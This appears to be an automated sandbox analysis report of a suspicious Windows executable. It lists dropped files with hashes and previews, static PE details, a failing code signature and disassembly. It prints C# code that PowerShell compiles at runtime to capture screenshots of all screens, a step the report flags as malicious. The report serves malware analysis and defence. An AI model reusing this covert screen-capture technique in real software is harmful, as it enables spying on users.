                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhvfp3jl.vew.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwfjhucn.ujl.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lr50uuyc.yjy.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcsert2o.rhe.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbzdtgau.rra.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrmfrudr.xar.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_razewbe1.bh3.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tjutlgwj.m2j.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpbubbqi.2it.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uswfctve.bxu.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xws0tuup.in5.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\bohkan2x\CSC24344491B9A34B60B194FE692FA1E0E5.TMP

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):652
                                                            Entropy (8bit):3.1053319510196555
                                                            Encrypted:false
                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryW+Nak7Ynqqr+CPN5Dlq5J:+RI+ycuZhNZakSnPNnqX
                                                            MD5:30FC31EF00E66964297235642C432108
                                                            SHA1:4585CE280DE1C9134C813CB638C135B34A623C02
                                                            SHA-256:A14C4CDDF8E1982FB215D7415A94176D351F50FC1E04CF1F613435AF580C217D
                                                            SHA-512:EFD00ABE14640470901529E7E7116CEF834A9E5D7C5FA658378D4FDCBD82CA05A02194E896D60998EF4F4A08B25179C9F060FD2E18A4FE94D50093FE52F83DD8
                                                            Malicious:false
                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.o.h.k.a.n.2.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.o.h.k.a.n.2.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                            C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.0.cs

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1004
                                                            Entropy (8bit):4.154581034278981
                                                            Encrypted:false
                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                            Malicious:false
                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                            C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):607
                                                            Entropy (8bit):5.385372746648231
                                                            Encrypted:false
                                                            SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfK2kWZEifK2h:V3ka6KOkqeFkOfbEiff
                                                            MD5:FFD41C26E0CE05043080AC778696A27B
                                                            SHA1:40A898742AA386E1A94DC9C786A57960A2617AB8
                                                            SHA-256:ED942CE0ADEB5ACBA5FCAD0482487D351FDB14986D450A7F2081004743CD75D7
                                                            SHA-512:50B73F7709949C4F262EBF91091D5116772C1F3665000A5BA4510F8559BF0B9AF9154F0FC65D49E41656D7F2B03DEF08752BFA52C416EBEA033F8DAA7989DCEF
                                                            Malicious:true
                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.0.cs"

                                                            C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.dll

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4096
                                                            Entropy (8bit):3.159423636460403
                                                            Encrypted:false
                                                            SSDEEP:48:6H7oEAtf0KhzBU/ff6mtJDgN0MopW1ulZa31q:1Nz0KmEOMObK
                                                            MD5:1F8C0D8BC3AA839238477B4DE10F75B7
                                                            SHA1:F4A5EEF0E3563B7137525AABAE7382144D744B43
                                                            SHA-256:B6478A084879FE723B520FCDC77CCEB2942271E24B32D68C4D8118E675B95307
                                                            SHA-512:600AAAFA56A04A6032C1EC9AEC3234C8E83FB99A56C4A61202E1FF7BC18E959D6675F1D8A839868D9E4F09D8C4274E90D63F148679F78B2518BD7AB7424DE1BD
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k6.f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                            C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.out

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):1148
                                                            Entropy (8bit):5.512406912468472
                                                            Encrypted:false
                                                            SSDEEP:24:KJfDId3ka6KOkqeFkOfbEifGKax5DqBVKVrdFAMBJTH:uDkka6NkqeFkybEuGK2DcVKdBJj
                                                            MD5:8EC65E50C60C4454F60AA853FE8976E6
                                                            SHA1:FD8042F2F254CE56BBEEADA907840F709DD82553
                                                            SHA-256:D8ABE0B617D56D0852C1903249944BC287300743C7E01254706C0F453DB69C95
                                                            SHA-512:8A26DDE31A90924D546C375173E0389695903F6D8C8D51361E49E5B12BCBD5717A308BD3DBD574030B287BAD710765C4146BE6527001D84D823B73DFBD48AF12
                                                            Malicious:false
                                                            Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer

                                                            \Device\ConDrv

                                                            Download File
                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):97
                                                            Entropy (8bit):4.331807756485642
                                                            Encrypted:false
                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                            Malicious:false
                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                            Static File Info

                                                            General

                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Entropy (8bit):7.9896081274846615
                                                            TrID:
                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                            • DOS Executable Generic (2002/1) 0.92%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:e45AiBoV6X.exe
                                                            File size:6'146'615 bytes
                                                            MD5:3e6d7972822636f67ccf275ebd140188
                                                            SHA1:b0a6df78dad3b697458d9296df134900b4b33177
                                                            SHA256:483a8ed2f54ab848a850e9b97207c3ed638ddd3e9fb01d19746f5d5b12e30525
                                                            SHA512:33ddaf1be46b12f5e954ca048029937262ada1d07063dccc2bb690d11ac304c6f2617be4f2c94fcc65f78e59dfbeb4d58f53b3bec0badc39280864e8a204d5c1
                                                            SSDEEP:98304:5I+nhjqJAEi65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeFJ9h4krWsT:5bnJiDOYjJlpZstQoS9Hf12VKXWb4CsG
                                                            TLSH:52563359726009F2F8B7827C8C828D0AEE3778140750D6DF43A047B55F67AE19E3BBA5
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc.....[hc...`.Qhc...g.Ihc...f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d..

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x14000c0d0
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x140000000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x668FE8D7 [Thu Jul 11 14:14:47 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:456e8615ad4320c9f54e50319a19df9c

                                                            Authenticode Signature

                                                            Signature Valid:false
                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232
                                                            Not Before, Not After
                                                            • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                            Subject Chain
                                                            • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                            Version:3
                                                            Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                            Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                            Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                            Serial:00BFB15001BBF592D4962A7797EA736FA3

                                                            Entrypoint Preview

                                                            Instruction
                                                            dec eax
                                                            sub esp, 28h
                                                            call 00007F7448ECC90Ch
                                                            dec eax
                                                            add esp, 28h
                                                            jmp 00007F7448ECC52Fh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            dec eax
                                                            sub esp, 28h
                                                            call 00007F7448ECCCD8h
                                                            test eax, eax
                                                            je 00007F7448ECC6D3h
                                                            dec eax
                                                            mov eax, dword ptr [00000030h]
                                                            dec eax
                                                            mov ecx, dword ptr [eax+08h]
                                                            jmp 00007F7448ECC6B7h
                                                            dec eax
                                                            cmp ecx, eax
                                                            je 00007F7448ECC6C6h
                                                            xor eax, eax
                                                            dec eax
                                                            cmpxchg dword ptr [0003843Ch], ecx
                                                            jne 00007F7448ECC6A0h
                                                            xor al, al
                                                            dec eax
                                                            add esp, 28h
                                                            ret
                                                            mov al, 01h
                                                            jmp 00007F7448ECC6A9h
                                                            int3
                                                            int3
                                                            int3
                                                            dec eax
                                                            sub esp, 28h
                                                            test ecx, ecx
                                                            jne 00007F7448ECC6B9h
                                                            mov byte ptr [00038425h], 00000001h
                                                            call 00007F7448ECBE05h
                                                            call 00007F7448ECD0F0h
                                                            test al, al
                                                            jne 00007F7448ECC6B6h
                                                            xor al, al
                                                            jmp 00007F7448ECC6C6h
                                                            call 00007F7448ED9BFFh
                                                            test al, al
                                                            jne 00007F7448ECC6BBh
                                                            xor ecx, ecx
                                                            call 00007F7448ECD100h
                                                            jmp 00007F7448ECC69Ch
                                                            mov al, 01h
                                                            dec eax
                                                            add esp, 28h
                                                            ret
                                                            int3
                                                            int3
                                                            inc eax
                                                            push ebx
                                                            dec eax
                                                            sub esp, 20h
                                                            cmp byte ptr [000383ECh], 00000000h
                                                            mov ebx, ecx
                                                            jne 00007F7448ECC719h
                                                            cmp ecx, 01h
                                                            jnbe 00007F7448ECC71Ch
                                                            call 00007F7448ECCC4Eh
                                                            test eax, eax
                                                            je 00007F7448ECC6DAh
                                                            test ebx, ebx
                                                            jne 00007F7448ECC6D6h
                                                            dec eax
                                                            lea ecx, dword ptr [000383D6h]
                                                            call 00007F7448ED99F2h

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3c76c0x78.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x490000x940.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x460000x2208.pdata
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x5da5ef0x2448
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a0000x768.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x39dc00x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39c800x140.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x450.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x292100x29400aca64598002ecff9eefbc96554edf015False0.5511067708333334data6.4784482217419175IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x2b0000x126420x12800b8b2005e12886bf623432f44aa9179a9False0.5245724239864865data5.7508719472021905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x3e0000x73d80xe00d0a288978c66419b180b35f625b6dce7False0.13532366071428573data1.8378139998458343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .pdata0x460000x22080x240074cf3ea22e0a1756984435d6f80f7da5False0.4671223958333333data5.259201915045256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .rsrc0x490000x9400xa00ab2532e179b4d6b0740f2d9f6cc35b70False0.426953125data5.1261425343830815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x4a0000x7680x80071de9271648326ec88350e903470cf3eFalse0.5576171875data5.283119454571673IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0x490a00x390data0.4605263157894737
                                                            RT_MANIFEST0x494300x50dXML 1.0 document, ASCII text0.4694508894044857

                                                            Imports

                                                            DLLImport
                                                            USER32.dllCreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                            COMCTL32.dll
